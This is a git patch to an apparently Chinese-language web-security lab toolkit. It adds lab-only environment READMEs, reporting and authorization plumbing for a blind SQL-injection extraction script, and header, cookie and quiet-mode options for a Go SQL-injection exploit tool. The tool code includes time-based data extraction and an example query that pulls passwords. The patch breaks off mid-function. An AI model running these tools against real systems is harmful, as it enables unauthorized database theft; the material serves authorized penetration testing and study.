From 2974cd9ad917847d6f37324c94ec5ff5f3dc2df1 Mon Sep 17 00:00:00 2001 From: hao Date: Mon, 16 Mar 2026 23:30:01 -0700 Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0:=20359=20=E4=B8=AA=E6=96=87?= =?UTF-8?q?=E4=BB=B6=20-=202026-03-16=2023:30:01?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 00-environments/README.md | 16 + 00-environments/catalog/README.md | 5 + 00-environments/profiles/README.md | 5 + 00-environments/templates/synthetic/README.md | 5 + 01-sql-injection/tools/blind-sqli.py | 118 ++++-- 01-sql-injection/tools/sqli-exploit.go | 128 ++++-- 01-sql-injection/tools/sqli-scanner.py | 75 +++- 02-xss/tools/xss-fuzzer.py | 95 ++++- 02-xss/tools/xss-scanner.go | 129 ++++-- .../bruteforce/tools/web-brute.py | 72 +++- 03-authentication/jwt/tools/jwt-cracker.py | 126 +++--- .../session/tools/session-lab.py | 99 +++++ .../infrastructure/tools/site-scope-mapper.py | 34 +- .../misconfiguration/tools/misconfig-lab.py | 96 +++++ .../scanning/tools/port-scanner.py | 55 ++- 04-server-security/tls/tools/tls-scanner.py | 97 ++--- 07-framework-security/cms/directus/INDEX.md | 12 +- 07-framework-security/cms/discourse/INDEX.md | 12 +- 07-framework-security/cms/drupal/INDEX.md | 12 +- 07-framework-security/cms/ghost/INDEX.md | 12 +- 07-framework-security/cms/joomla/INDEX.md | 12 +- 07-framework-security/cms/mediawiki/INDEX.md | 12 +- 07-framework-security/cms/moodle/INDEX.md | 12 +- 07-framework-security/cms/strapi/INDEX.md | 12 +- 07-framework-security/cms/wordpress/INDEX.md | 12 +- .../ecommerce/adobe-commerce/INDEX.md | 12 +- .../ecommerce/magento-open-source/INDEX.md | 12 +- .../ecommerce/medusa/INDEX.md | 12 +- .../ecommerce/opencart/INDEX.md | 12 +- .../ecommerce/openmage/INDEX.md | 12 +- .../ecommerce/prestashop/INDEX.md | 12 +- .../ecommerce/saleor/INDEX.md | 12 +- .../ecommerce/shopware/INDEX.md | 12 +- .../ecommerce/woocommerce/INDEX.md | 12 +- .../frameworks/angular/INDEX.md | 12 +- .../frameworks/aspnet-core/INDEX.md | 12 +- .../frameworks/astro/INDEX.md | 12 +- .../frameworks/django/INDEX.md | 12 +- .../frameworks/echo/INDEX.md | 12 +- .../frameworks/esbuild/INDEX.md | 12 +- .../frameworks/express/INDEX.md | 12 +- .../frameworks/fastify/INDEX.md | 12 +- .../frameworks/flask/INDEX.md | 12 +- 07-framework-security/frameworks/gin/INDEX.md | 12 +- .../frameworks/hapi/INDEX.md | 12 +- 07-framework-security/frameworks/koa/INDEX.md | 12 +- .../frameworks/laravel/INDEX.md | 12 +- .../frameworks/nestjs/INDEX.md | 12 +- .../frameworks/nextjs/INDEX.md | 62 +-- .../nextjs/cases/nextjs-cve-2020-15242.md | 13 + .../nextjs/cases/nextjs-cve-2020-5284.md | 13 + .../nextjs/cases/nextjs-cve-2021-37699.md | 13 + .../nextjs/cases/nextjs-cve-2021-39178.md | 13 + .../nextjs/cases/nextjs-cve-2021-43803.md | 13 + .../nextjs/cases/nextjs-cve-2024-34351.md | 13 + .../nextjs/cases/nextjs-cve-2024-46982.md | 13 + .../nextjs/cases/nextjs-cve-2024-47831.md | 13 + .../nextjs/cases/nextjs-cve-2024-51479.md | 13 + .../nextjs/cases/nextjs-cve-2024-56332.md | 13 + .../nextjs/cases/nextjs-cve-2025-29927.md | 13 + .../nextjs/cases/nextjs-cve-2025-30218.md | 13 + .../nextjs/cases/nextjs-cve-2025-32421.md | 13 + .../nextjs/cases/nextjs-cve-2025-48068.md | 13 + .../nextjs/cases/nextjs-cve-2025-49005.md | 13 + .../nextjs/cases/nextjs-cve-2025-49826.md | 13 + .../nextjs/cases/nextjs-cve-2025-55173.md | 13 + .../nextjs/cases/nextjs-cve-2025-57752.md | 13 + .../nextjs/cases/nextjs-cve-2025-57822.md | 13 + .../nextjs/cases/nextjs-cve-2025-59471.md | 13 + .../nextjs/cases/nextjs-cve-2025-59472.md | 13 + .../cases/nextjs-ghsa-5j59-xgg2-r9c4.md | 13 + .../cases/nextjs-ghsa-9qr9-h5gf-34mp.md | 13 + .../cases/nextjs-ghsa-h25m-26qc-wcjf.md | 13 + .../cases/nextjs-ghsa-mwv6-3258-q52c.md | 13 + .../cases/nextjs-ghsa-w37m-7fhw-fmv9.md | 13 + .../frameworks/nodejs/INDEX.md | 12 +- .../frameworks/nuxt/INDEX.md | 12 +- .../frameworks/rails/INDEX.md | 12 +- .../frameworks/react/INDEX.md | 12 +- .../frameworks/spring-boot/INDEX.md | 12 +- .../frameworks/spring-framework/INDEX.md | 12 +- .../frameworks/spring-security/INDEX.md | 12 +- .../frameworks/sveltekit/INDEX.md | 12 +- .../frameworks/symfony/INDEX.md | 12 +- .../frameworks/undici/INDEX.md | 38 +- .../undici/cases/undici-cve-2022-31151.md | 13 + .../undici/cases/undici-cve-2022-32210.md | 13 + .../undici/cases/undici-cve-2023-45143.md | 13 + .../undici/cases/undici-cve-2024-30260.md | 13 + .../undici/cases/undici-cve-2024-30261.md | 13 + .../undici/cases/undici-cve-2025-22150.md | 13 + .../undici/cases/undici-cve-2025-47279.md | 13 + .../undici/cases/undici-cve-2026-1525.md | 13 + .../undici/cases/undici-cve-2026-1526.md | 13 + .../undici/cases/undici-cve-2026-1527.md | 13 + .../undici/cases/undici-cve-2026-1528.md | 13 + .../undici/cases/undici-cve-2026-22036.md | 13 + .../undici/cases/undici-cve-2026-2229.md | 13 + .../undici/cases/undici-cve-2026-2581.md | 13 + .../frameworks/vite/INDEX.md | 34 +- .../vite/cases/vite-cve-2024-23331.md | 13 + .../vite/cases/vite-cve-2024-45811.md | 13 + .../vite/cases/vite-cve-2024-45812.md | 13 + .../vite/cases/vite-cve-2025-24010.md | 13 + .../vite/cases/vite-cve-2025-30208.md | 13 + .../vite/cases/vite-cve-2025-31125.md | 13 + .../vite/cases/vite-cve-2025-31486.md | 13 + .../vite/cases/vite-cve-2025-32395.md | 13 + .../vite/cases/vite-cve-2025-46565.md | 13 + .../vite/cases/vite-cve-2025-58751.md | 13 + .../vite/cases/vite-cve-2025-58752.md | 13 + .../vite/cases/vite-cve-2025-62522.md | 13 + 07-framework-security/frameworks/vue/INDEX.md | 12 +- .../frameworks/webpack/INDEX.md | 12 +- .../frameworks/werkzeug/INDEX.md | 12 +- .../platforms/adminer/INDEX.md | 12 +- .../platforms/gitea/INDEX.md | 84 ++-- .../gitea/cases/gitea-cve-2018-15192.md | 13 + .../gitea/cases/gitea-cve-2018-18926.md | 13 + .../gitea/cases/gitea-cve-2019-1010261.md | 13 + .../gitea/cases/gitea-cve-2020-13246.md | 13 + .../gitea/cases/gitea-cve-2021-28378.md | 13 + .../gitea/cases/gitea-cve-2021-29134.md | 13 + .../gitea/cases/gitea-cve-2021-3382.md | 13 + .../gitea/cases/gitea-cve-2021-45327.md | 13 + .../gitea/cases/gitea-cve-2021-45330.md | 13 + .../gitea/cases/gitea-cve-2021-45331.md | 13 + .../gitea/cases/gitea-cve-2022-0905.md | 13 + .../gitea/cases/gitea-cve-2022-1058.md | 13 + .../gitea/cases/gitea-cve-2022-1928.md | 13 + .../gitea/cases/gitea-cve-2022-27313.md | 13 + .../gitea/cases/gitea-cve-2022-30781.md | 13 + .../gitea/cases/gitea-cve-2022-38183.md | 13 + .../gitea/cases/gitea-cve-2022-38795.md | 13 + .../gitea/cases/gitea-cve-2022-42968.md | 13 + .../gitea/cases/gitea-cve-2025-68938.md | 13 + .../gitea/cases/gitea-cve-2025-68939.md | 13 + .../gitea/cases/gitea-cve-2025-68940.md | 13 + .../gitea/cases/gitea-cve-2025-68941.md | 13 + .../gitea/cases/gitea-cve-2025-68942.md | 13 + .../gitea/cases/gitea-cve-2025-68943.md | 13 + .../gitea/cases/gitea-cve-2025-68944.md | 13 + .../gitea/cases/gitea-cve-2025-68945.md | 13 + .../gitea/cases/gitea-cve-2025-68946.md | 13 + .../gitea/cases/gitea-cve-2025-69413.md | 13 + .../gitea/cases/gitea-cve-2026-0798.md | 13 + .../gitea/cases/gitea-cve-2026-20736.md | 13 + .../gitea/cases/gitea-cve-2026-20750.md | 13 + .../gitea/cases/gitea-cve-2026-20800.md | 13 + .../gitea/cases/gitea-cve-2026-20883.md | 13 + .../gitea/cases/gitea-cve-2026-20888.md | 13 + .../gitea/cases/gitea-cve-2026-20897.md | 13 + .../gitea/cases/gitea-cve-2026-20904.md | 13 + .../gitea/cases/gitea-cve-2026-20912.md | 13 + .../platforms/gitlab-ce/INDEX.md | 12 +- .../platforms/grafana/INDEX.md | 12 +- .../platforms/jenkins/INDEX.md | 12 +- .../platforms/kibana/INDEX.md | 12 +- .../platforms/mattermost/INDEX.md | 12 +- .../platforms/phpmyadmin/INDEX.md | 12 +- .../platforms/redmine/INDEX.md | 12 +- .../servers/apache-httpd/INDEX.md | 12 +- .../servers/apache-tomcat/INDEX.md | 12 +- 07-framework-security/servers/caddy/INDEX.md | 12 +- .../servers/haproxy/INDEX.md | 12 +- 07-framework-security/servers/nginx/INDEX.md | 12 +- .../servers/traefik/INDEX.md | 12 +- 08-threat-intel/generated/coverage-matrix.md | 128 +++--- .../generated/dashboard/index.html | 44 ++ 08-threat-intel/generated/dashboard/runs.json | 1 + .../generated/dashboard/summary.json | 5 + 08-threat-intel/generated/latest-ingest.md | 3 +- 08-threat-intel/generated/run-summary.json | 3 +- .../advisories/gitea--CVE-2018-15192.json | 13 + .../advisories/gitea--CVE-2018-18926.json | 13 + .../advisories/gitea--CVE-2019-1010261.json | 13 + .../advisories/gitea--CVE-2020-13246.json | 13 + .../advisories/gitea--CVE-2021-28378.json | 13 + .../advisories/gitea--CVE-2021-29134.json | 13 + .../advisories/gitea--CVE-2021-3382.json | 13 + .../advisories/gitea--CVE-2021-45327.json | 13 + .../advisories/gitea--CVE-2021-45330.json | 13 + .../advisories/gitea--CVE-2021-45331.json | 13 + .../advisories/gitea--CVE-2022-0905.json | 13 + .../advisories/gitea--CVE-2022-1058.json | 13 + .../advisories/gitea--CVE-2022-1928.json | 13 + .../advisories/gitea--CVE-2022-27313.json | 13 + .../advisories/gitea--CVE-2022-30781.json | 13 + .../advisories/gitea--CVE-2022-38183.json | 13 + .../advisories/gitea--CVE-2022-38795.json | 13 + .../advisories/gitea--CVE-2022-42968.json | 13 + .../advisories/gitea--CVE-2025-68938.json | 13 + .../advisories/gitea--CVE-2025-68939.json | 13 + .../advisories/gitea--CVE-2025-68940.json | 13 + .../advisories/gitea--CVE-2025-68941.json | 13 + .../advisories/gitea--CVE-2025-68942.json | 13 + .../advisories/gitea--CVE-2025-68943.json | 13 + .../advisories/gitea--CVE-2025-68944.json | 13 + .../advisories/gitea--CVE-2025-68945.json | 13 + .../advisories/gitea--CVE-2025-68946.json | 13 + .../advisories/gitea--CVE-2025-69413.json | 13 + .../advisories/gitea--CVE-2026-0798.json | 13 + .../advisories/gitea--CVE-2026-20736.json | 13 + .../advisories/gitea--CVE-2026-20750.json | 13 + .../advisories/gitea--CVE-2026-20800.json | 13 + .../advisories/gitea--CVE-2026-20883.json | 13 + .../advisories/gitea--CVE-2026-20888.json | 13 + .../advisories/gitea--CVE-2026-20897.json | 13 + .../advisories/gitea--CVE-2026-20904.json | 13 + .../advisories/gitea--CVE-2026-20912.json | 13 + .../advisories/nextjs--CVE-2020-15242.json | 13 + .../advisories/nextjs--CVE-2020-5284.json | 13 + .../advisories/nextjs--CVE-2021-37699.json | 13 + .../advisories/nextjs--CVE-2021-39178.json | 13 + .../advisories/nextjs--CVE-2021-43803.json | 13 + .../advisories/nextjs--CVE-2024-34351.json | 13 + .../advisories/nextjs--CVE-2024-46982.json | 13 + .../advisories/nextjs--CVE-2024-47831.json | 13 + .../advisories/nextjs--CVE-2024-51479.json | 13 + .../advisories/nextjs--CVE-2024-56332.json | 13 + .../advisories/nextjs--CVE-2025-29927.json | 13 + .../advisories/nextjs--CVE-2025-30218.json | 13 + .../advisories/nextjs--CVE-2025-32421.json | 13 + .../advisories/nextjs--CVE-2025-48068.json | 13 + .../advisories/nextjs--CVE-2025-49005.json | 13 + .../advisories/nextjs--CVE-2025-49826.json | 13 + .../advisories/nextjs--CVE-2025-55173.json | 13 + .../advisories/nextjs--CVE-2025-57752.json | 13 + .../advisories/nextjs--CVE-2025-57822.json | 13 + .../advisories/nextjs--CVE-2025-59471.json | 13 + .../advisories/nextjs--CVE-2025-59472.json | 13 + .../nextjs--GHSA-5j59-xgg2-r9c4.json | 13 + .../nextjs--GHSA-9qr9-h5gf-34mp.json | 13 + .../nextjs--GHSA-h25m-26qc-wcjf.json | 13 + .../nextjs--GHSA-mwv6-3258-q52c.json | 13 + .../nextjs--GHSA-w37m-7fhw-fmv9.json | 13 + .../advisories/undici--CVE-2022-31151.json | 13 + .../advisories/undici--CVE-2022-32210.json | 13 + .../advisories/undici--CVE-2023-45143.json | 13 + .../advisories/undici--CVE-2024-30260.json | 13 + .../advisories/undici--CVE-2024-30261.json | 13 + .../advisories/undici--CVE-2025-22150.json | 13 + .../advisories/undici--CVE-2025-47279.json | 13 + .../advisories/undici--CVE-2026-1525.json | 13 + .../advisories/undici--CVE-2026-1526.json | 13 + .../advisories/undici--CVE-2026-1527.json | 13 + .../advisories/undici--CVE-2026-1528.json | 13 + .../advisories/undici--CVE-2026-22036.json | 13 + .../advisories/undici--CVE-2026-2229.json | 13 + .../advisories/undici--CVE-2026-2581.json | 13 + .../advisories/vite--CVE-2024-23331.json | 13 + .../advisories/vite--CVE-2024-45811.json | 13 + .../advisories/vite--CVE-2024-45812.json | 13 + .../advisories/vite--CVE-2025-24010.json | 13 + .../advisories/vite--CVE-2025-30208.json | 13 + .../advisories/vite--CVE-2025-31125.json | 13 + .../advisories/vite--CVE-2025-31486.json | 13 + .../advisories/vite--CVE-2025-32395.json | 13 + .../advisories/vite--CVE-2025-46565.json | 13 + .../advisories/vite--CVE-2025-58751.json | 13 + .../advisories/vite--CVE-2025-58752.json | 13 + .../advisories/vite--CVE-2025-62522.json | 13 + 08-threat-intel/registry/systems/adminer.json | 4 + .../registry/systems/adobe-commerce.json | 4 + 08-threat-intel/registry/systems/angular.json | 4 + .../registry/systems/apache-httpd.json | 4 + .../registry/systems/apache-tomcat.json | 4 + .../registry/systems/aspnet-core.json | 4 + 08-threat-intel/registry/systems/astro.json | 4 + 08-threat-intel/registry/systems/caddy.json | 4 + .../registry/systems/directus.json | 4 + .../registry/systems/discourse.json | 4 + 08-threat-intel/registry/systems/django.json | 4 + 08-threat-intel/registry/systems/drupal.json | 4 + 08-threat-intel/registry/systems/echo.json | 4 + 08-threat-intel/registry/systems/esbuild.json | 4 + 08-threat-intel/registry/systems/express.json | 4 + 08-threat-intel/registry/systems/fastify.json | 4 + 08-threat-intel/registry/systems/flask.json | 4 + 08-threat-intel/registry/systems/ghost.json | 4 + 08-threat-intel/registry/systems/gin.json | 4 + 08-threat-intel/registry/systems/gitea.json | 4 + .../registry/systems/gitlab-ce.json | 4 + 08-threat-intel/registry/systems/grafana.json | 4 + 08-threat-intel/registry/systems/hapi.json | 4 + 08-threat-intel/registry/systems/haproxy.json | 4 + 08-threat-intel/registry/systems/jenkins.json | 4 + 08-threat-intel/registry/systems/joomla.json | 4 + 08-threat-intel/registry/systems/kibana.json | 4 + 08-threat-intel/registry/systems/koa.json | 4 + 08-threat-intel/registry/systems/laravel.json | 4 + .../registry/systems/magento-open-source.json | 4 + .../registry/systems/mattermost.json | 4 + .../registry/systems/mediawiki.json | 4 + 08-threat-intel/registry/systems/medusa.json | 4 + 08-threat-intel/registry/systems/moodle.json | 4 + 08-threat-intel/registry/systems/nestjs.json | 4 + 08-threat-intel/registry/systems/nextjs.json | 4 + 08-threat-intel/registry/systems/nginx.json | 4 + 08-threat-intel/registry/systems/nodejs.json | 4 + 08-threat-intel/registry/systems/nuxt.json | 4 + .../registry/systems/opencart.json | 4 + .../registry/systems/openmage.json | 4 + .../registry/systems/phpmyadmin.json | 4 + .../registry/systems/prestashop.json | 4 + 08-threat-intel/registry/systems/rails.json | 4 + 08-threat-intel/registry/systems/react.json | 4 + 08-threat-intel/registry/systems/redmine.json | 4 + 08-threat-intel/registry/systems/saleor.json | 4 + .../registry/systems/shopware.json | 4 + .../registry/systems/spring-boot.json | 4 + .../registry/systems/spring-framework.json | 4 + .../registry/systems/spring-security.json | 4 + 08-threat-intel/registry/systems/strapi.json | 4 + .../registry/systems/sveltekit.json | 4 + 08-threat-intel/registry/systems/symfony.json | 4 + 08-threat-intel/registry/systems/traefik.json | 4 + 08-threat-intel/registry/systems/undici.json | 4 + 08-threat-intel/registry/systems/vite.json | 4 + 08-threat-intel/registry/systems/vue.json | 4 + 08-threat-intel/registry/systems/webpack.json | 4 + .../registry/systems/werkzeug.json | 4 + .../registry/systems/woocommerce.json | 4 + .../registry/systems/wordpress.json | 4 + .../family-generic/authz-bypass-generic.yaml | 31 ++ .../deserialization-generic.yaml | 30 ++ .../family-generic/file-upload-generic.yaml | 31 ++ .../misconfiguration-generic.yaml | 41 ++ .../path-traversal-generic.yaml | 30 ++ .../plugin-extension-generic.yaml | 32 ++ .../proxy-boundary-generic.yaml | 40 ++ .../request-smuggling-generic.yaml | 30 ++ .../family-generic/session-token-generic.yaml | 42 ++ .../family-generic/sqli-generic.yaml | 39 ++ .../family-generic/ssrf-generic.yaml | 30 ++ .../template-injection-generic.yaml | 30 ++ .../family-generic/xss-generic.yaml | 44 ++ scripts/intel/config.py | 13 + scripts/intel/models.py | 15 + scripts/intel/render.py | 83 +++- scripts/intel/validators.py | 9 +- scripts/lab/__init__.py | 1 + scripts/lab/attack.py | 66 +++ scripts/lab/baseline.py | 28 ++ scripts/lab/browser.py | 47 +++ scripts/lab/catalog.py | 254 ++++++++++++ scripts/lab/compose.py | 32 ++ scripts/lab/config.py | 25 ++ scripts/lab/evidence.py | 32 ++ scripts/lab/main.py | 380 ++++++++++++++++++ scripts/lab/provision.py | 40 ++ scripts/lab/render.py | 166 ++++++++ scripts/lab/repro.py | 157 ++++++++ scripts/lab/run-queue.sh | 11 + scripts/lab/seed.py | 14 + scripts/lab/task_queue.py | 49 +++ scripts/lab/utils.py | 103 +++++ scripts/lab/validators.py | 35 ++ scripts/tool_contract.py | 180 +++++++++ 359 files changed, 6332 insertions(+), 673 deletions(-) create mode 100644 00-environments/README.md create mode 100644 00-environments/catalog/README.md create mode 100644 00-environments/profiles/README.md create mode 100644 00-environments/templates/synthetic/README.md create mode 100644 03-authentication/session/tools/session-lab.py create mode 100644 04-server-security/misconfiguration/tools/misconfig-lab.py create mode 100644 08-threat-intel/generated/dashboard/index.html create mode 100644 08-threat-intel/generated/dashboard/runs.json create mode 100644 08-threat-intel/generated/dashboard/summary.json create mode 100644 08-threat-intel/repro-profiles/family-generic/authz-bypass-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/deserialization-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/file-upload-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/misconfiguration-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/path-traversal-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/plugin-extension-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/proxy-boundary-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/request-smuggling-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/session-token-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/sqli-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/ssrf-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/template-injection-generic.yaml create mode 100644 08-threat-intel/repro-profiles/family-generic/xss-generic.yaml create mode 100644 scripts/lab/__init__.py create mode 100644 scripts/lab/attack.py create mode 100644 scripts/lab/baseline.py create mode 100644 scripts/lab/browser.py create mode 100644 scripts/lab/catalog.py create mode 100644 scripts/lab/compose.py create mode 100644 scripts/lab/config.py create mode 100644 scripts/lab/evidence.py create mode 100644 scripts/lab/main.py create mode 100644 scripts/lab/provision.py create mode 100644 scripts/lab/render.py create mode 100644 scripts/lab/repro.py create mode 100644 scripts/lab/run-queue.sh create mode 100644 scripts/lab/seed.py create mode 100644 scripts/lab/task_queue.py create mode 100644 scripts/lab/utils.py create mode 100644 scripts/lab/validators.py create mode 100644 scripts/tool_contract.py diff --git a/00-environments/README.md b/00-environments/README.md new file mode 100644 index 00000000..00e34bf5 --- /dev/null +++ b/00-environments/README.md @@ -0,0 +1,16 @@ +# 环境编排与靶站目录 + +> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | `非生产环境` + +本目录承载授权攻防实验的本地靶站编排和复现资产,分为三层: + +- `catalog/systems/` + - 每个主流开源 Web 系统的环境供应元数据、默认 artifact 模式和服务提示。 +- `profiles/` + - 可执行环境 profile,按 `core//current.yaml` 存放当前默认复现入口。 +- `templates/synthetic/` + - 当历史版本或扩展包无法稳定获取时使用的最小合成靶场模板。 + +- [catalog](/Users/x/websafe/00-environments/catalog/README.md) +- [profiles](/Users/x/websafe/00-environments/profiles/README.md) +- [synthetic templates](/Users/x/websafe/00-environments/templates/synthetic/README.md) diff --git a/00-environments/catalog/README.md b/00-environments/catalog/README.md new file mode 100644 index 00000000..83fe1a9d --- /dev/null +++ b/00-environments/catalog/README.md @@ -0,0 +1,5 @@ +# 环境 Catalog + +> `LAB ONLY` | 自动生成与维护 + +`systems/*.yaml` 是每个系统的环境供应真值,用于决定优先走真实版本还是 synthetic 补位。 diff --git a/00-environments/profiles/README.md b/00-environments/profiles/README.md new file mode 100644 index 00000000..4186a6c7 --- /dev/null +++ b/00-environments/profiles/README.md @@ -0,0 +1,5 @@ +# 环境 Profiles + +> `LAB ONLY` | 自动生成与维护 + +`core//current.yaml` 提供每个系统当前默认的可运行 profile。后续可以按需要扩展到具体版本文件。 diff --git a/00-environments/templates/synthetic/README.md b/00-environments/templates/synthetic/README.md new file mode 100644 index 00000000..cde09e20 --- /dev/null +++ b/00-environments/templates/synthetic/README.md @@ -0,0 +1,5 @@ +# Synthetic Templates + +> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` + +当无法稳定获取历史版本、插件包或模块工件时,允许使用最小合成靶场补位。所有 synthetic 结果都必须在案例页和 registry 中显式标注。 diff --git a/01-sql-injection/tools/blind-sqli.py b/01-sql-injection/tools/blind-sqli.py index 41fecb4c..d8f75b87 100644 --- a/01-sql-injection/tools/blind-sqli.py +++ b/01-sql-injection/tools/blind-sqli.py @@ -33,6 +33,24 @@ import urllib.parse from concurrent.futures import ThreadPoolExecutor, as_completed from typing import Callable, Optional, List import sys +from pathlib import Path +import contextlib +import io + + +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import ( # noqa: E402 + add_common_args, + emit_report, + ensure_authorized, + make_report, + parse_cookie_string, + parse_headers, + write_evidence, +) class Colors: @@ -332,8 +350,10 @@ def main(): ) parser.add_argument("--true-indicator", help="布尔盲注真值指示器") parser.add_argument("-t", "--threads", type=int, default=1, help="线程数") + add_common_args(parser) args = parser.parse_args() + ensure_authorized(args, parser) requests.packages.urllib3.disable_warnings() @@ -344,12 +364,7 @@ def main(): k, v = pair.split("=", 1) data[k] = v - cookies = {} - if args.cookie: - for pair in args.cookie.split(";"): - if "=" in pair: - k, v = pair.strip().split("=", 1) - cookies[k] = v + cookies = parse_cookie_string(args.cookie) exploit = BlindSQLi( url=args.url, @@ -360,32 +375,81 @@ def main(): delay=args.delay, threads=args.threads, ) + exploit.session.headers.update(parse_headers(args.header)) + if args.proxy: + exploit.session.proxies.update({"http": args.proxy, "https": args.proxy}) + if args.format != "text": + exploit._print = lambda *_args, **_kwargs: None # type: ignore[assignment] - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") + result = None + stdout_buffer = io.StringIO() + capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext() - if args.query: - result = exploit.extract_string( - args.query, args.technique, args.dbms, true_indicator=args.true_indicator - ) - print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}") + with capture: + if args.query: + result = exploit.extract_string( + args.query, args.technique, args.dbms, true_indicator=args.true_indicator + ) - elif args.extract: - result = exploit.auto_extract(args.extract, args.dbms, args.technique) - print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}") + elif args.extract: + result = exploit.auto_extract(args.extract, args.dbms, args.technique) - else: - print( - f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}" - ) - print(f"\n示例:") - print(f" --extract user 提取当前用户") - print(f" --extract database 提取当前数据库") - print(f" --extract version 提取数据库版本") - print(f' --query "SELECT password FROM users LIMIT 1"') + if args.format == "text": + print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") + print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}") + print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") + if args.query: + print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}") + elif args.extract: + print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}") + else: + print( + f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}" + ) + print(f"\n示例:") + print(f" --extract user 提取当前用户") + print(f" --extract database 提取当前数据库") + print(f" --extract version 提取数据库版本") + print(f' --query "SELECT password FROM users LIMIT 1"') + print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") + evidence_refs = [] + ref = write_evidence( + args, + "blind-sqli-result.json", + { + "result": result, + "captured_stdout": stdout_buffer.getvalue()[-1000:], + "technique": args.technique, + "dbms": args.dbms, + }, + ) + if ref: + evidence_refs.append(ref) + status = "verified" if result else "needs-review" + severity = "high" if result else "medium" + report = make_report( + tool="blind-sqli", + mode=f"{args.technique}-blind-extraction", + target=args.url, + status=status, + severity=severity, + payload_or_probe={"query": args.query, "extract": args.extract, "result": result}, + request_summary={"param": args.param, "dbms": args.dbms, "threads": args.threads}, + evidence_refs=evidence_refs, + destructive_risk="medium", + args=args, + ) + text_lines = [ + "=" * 60, + "Blind SQL Injection Exploit Tool", + "=" * 60, + f"Target: {args.url}", + f"Technique: {args.technique}", + f"Result Present: {'yes' if result else 'no'}", + f"Status: {status}", + ] + emit_report(args, report, text_lines) if __name__ == "__main__": diff --git a/01-sql-injection/tools/sqli-exploit.go b/01-sql-injection/tools/sqli-exploit.go index 6bd4ba53..305db33b 100644 --- a/01-sql-injection/tools/sqli-exploit.go +++ b/01-sql-injection/tools/sqli-exploit.go @@ -2,11 +2,13 @@ package main import ( + "encoding/json" "flag" "fmt" "io" "net/http" "net/url" + "os" "strings" "sync" "time" @@ -19,6 +21,9 @@ type SQLiExploit struct { Param string Threads int Timeout time.Duration + Headers map[string]string + Cookie string + Quiet bool } type InjectionResult struct { @@ -51,6 +56,7 @@ func NewSQLiExploit(target, method, param string, threads int, timeout time.Dura Param: param, Threads: threads, Timeout: timeout, + Headers: map[string]string{}, } } @@ -78,6 +84,12 @@ func (s *SQLiExploit) SendRequest(payload string) (string, int, error) { } req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36") + for k, v := range s.Headers { + req.Header.Set(k, v) + } + if s.Cookie != "" { + req.Header.Set("Cookie", s.Cookie) + } resp, err := s.Client.Do(req) if err != nil { @@ -120,8 +132,10 @@ func (s *SQLiExploit) TestTimeBased(payloads []struct { ResponseLen: respLen, }) mu.Unlock() - fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n", - colorRed+colorBold, colorEnd, payload, elapsed, dbms) + if !s.Quiet { + fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n", + colorRed+colorBold, colorEnd, payload, elapsed, dbms) + } } }(p.Payload, p.DBMS, p.Delay) } @@ -159,8 +173,10 @@ func (s *SQLiExploit) TestErrorBased(payloads []struct { DBMS: dbms, ResponseLen: respLen, }) - fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n", - colorRed+colorBold, colorEnd, p.Payload, dbms) + if !s.Quiet { + fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n", + colorRed+colorBold, colorEnd, p.Payload, dbms) + } break } } @@ -173,7 +189,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m var result strings.Builder charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@." - fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query) + if !s.Quiet { + fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query) + } for pos := 1; pos <= maxLen; pos++ { found := false @@ -197,7 +215,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m if elapsed >= 900*time.Millisecond { result.WriteByte(byte(char)) found = true - fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String()) + if !s.Quiet { + fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String()) + } break } } @@ -212,6 +232,21 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m return result.String() } +func parseHeaders(raw string) map[string]string { + headers := map[string]string{} + if raw == "" { + return headers + } + for _, part := 